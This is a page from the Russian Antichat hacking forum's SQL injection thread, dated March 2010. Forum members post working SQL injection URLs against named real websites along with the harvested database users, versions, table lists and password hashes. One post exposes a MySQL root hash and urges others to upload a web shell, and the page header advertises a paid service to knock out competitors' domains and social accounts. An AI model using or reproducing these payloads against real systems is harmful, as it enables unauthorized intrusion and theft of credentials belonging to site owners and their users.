Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1164 из 1242

1164

Опции темы

Поиск в этой теме

Опции просмотра

#11631

23.03.2010, 18:46

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://zachor.michlalah.edu/english/events/main.asp?year1=63&mesT=1&num=2+union+select+1,2,3, 4,5,6,7,8,9,10+from+events

Microsoft Jet DB

#11632

23.03.2010, 18:53

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Цитата:

_http://stendik.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password,user_email),5,6,7,8,9,10,11,12,13,14,15, 16,17,18+from+kasseler_users--+

Админко /admin.php

Шоп + админка ничего интересного

#11633

23.03.2010, 19:03

sqlinjector

Новичок

Регистрация: 31.12.2009

Сообщений: 19

Провел на форуме:
60679

Репутация: 10

Шоп + админка ничего интересного

админка /admin

Код HTML:

http://www.offroadbikepartsonline.com.au/detail.php?prod_id=-32%27+union+select+1,2,3,4,5,6,7,8,9,group_concat(version(),0x3a,user(),0x3a,database()+separator+0x0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cat_id=15

#11634

23.03.2010, 19:10

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://org.business.utah.edu/studentfund/historical/trandetail.php?ticker=spy&pnum=2'скуль&snum=4 8

Version: 5.0.45-log
User: andy@localhost
dbname: studentfund

#11635

23.03.2010, 19:33

root_sashok

Познавший АНТИЧАТ

Регистрация: 04.08.2008

Сообщений: 1,359

Провел на форуме:
8220635

Репутация: 1593

Отправить сообщение для root_sashok с помощью ICQ

Код:

http://www.lyricsprovider.com/song.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7--

Username: lyricsprovider@localhost
Database: lyricsprovider
Version: 5.0.45

Таблицы:

Код:

ads_admin_session
ads_adposition
ads_banner
ads_banzone
ads_stats
ads_user
ads_zone
album_lyrics
albums
artist_links
artists
counter
flash_access
flash_poll
guest_lyrics
guests
lyric_details
lyric_discus
lyric_quality_rate
lyric_send
lyric_urls
lyrics
mb_replies
partners
stats
stats_reset
titles
top20usa
top40
updates

Последний раз редактировалось root_sashok; 23.03.2010 в 19:36..

#11636

23.03.2010, 19:41

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Отправить сообщение для CyberHunter с помощью ICQ

Код:

http://content.tcc.fl.edu/contacts/show.asp?type=area&id=19+or+1=%28select+top+1+table_name+from+information_schema.tables%29+--+

Моя первая mssql

#11637

23.03.2010, 20:13

root_sashok

Познавший АНТИЧАТ

Регистрация: 04.08.2008

Сообщений: 1,359

Провел на форуме:
8220635

Репутация: 1593

Код:

http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+

Username: plantree_admin@localhost
Database: planningtree_db
Version: 5.0.45-Debian_1ubuntu3.1-log

Есть таблица users.

Пример вывода пользователя с хешом:

Код:

http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+users+limit+5,1--+

Код:

http://www.nl-fotostudio.com/view.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9,10,11,12--

Username: s001w6@srv1.mw-internet.net
Database: usr_s001w6_1
Version: 4.1.13-log

Последний раз редактировалось root_sashok; 23.03.2010 в 20:32..

#11638

23.03.2010, 20:21

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Код:

http://monne.ru/?show=catalog&id=-19+union+select+1,2,version%28%29,4+--+

Version: 4.1.22-standard
User: monneru_adm@localhost
Database: monneru_main

Код:

http://www.veorkf.ru/catalog/dog.php?screen=1&id=-19+union+select+version%28%29,2,3,4,5,6+--+

Version: 4.1.25-LOG
User: VEORKFR5_VEO@LOCALHOST
Database: VEORKFR5_VEO

Последний раз редактировалось CyberHunter; 23.03.2010 в 20:36..

#11639

23.03.2010, 20:38

root_sashok

Познавший АНТИЧАТ

Регистрация: 04.08.2008

Сообщений: 1,359

Провел на форуме:
8220635

Репутация: 1593

Код:

http://theinterculturalinstitute.com/english/photogallery/view.php?id=74+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12--

Username: web152@localhost
Database: usr_web152_1
Version: 5.0.51a-3ubuntu5.1

#11640

23.03.2010, 20:39

daniel_1024

Участник форума

Регистрация: 15.07.2009

Сообщений: 158

Провел на форуме:
698831

Репутация: 34

India IT Hub :D компьютерная тематика :D

Цитата:

http://www.indiaithub.com/seller/prod_detail.php?prod_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,23

user:root@localhost
mysql.password:7dc01c3d60c0672f
base:indiaithub
ver:4.0.27-standard
mysql.user:account
file_priv:Y
os:pc-linux-gnu

есть таблицы:

Цитата:

auth
subscriber
user
mysql.user
shop
download
session
news

З.Ы file_priv:Y, ну залейте им кто-нибудь шелл)

Последний раз редактировалось daniel_1024; 23.03.2010 в 21:50..

Страница 1164 из 1242

1164

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход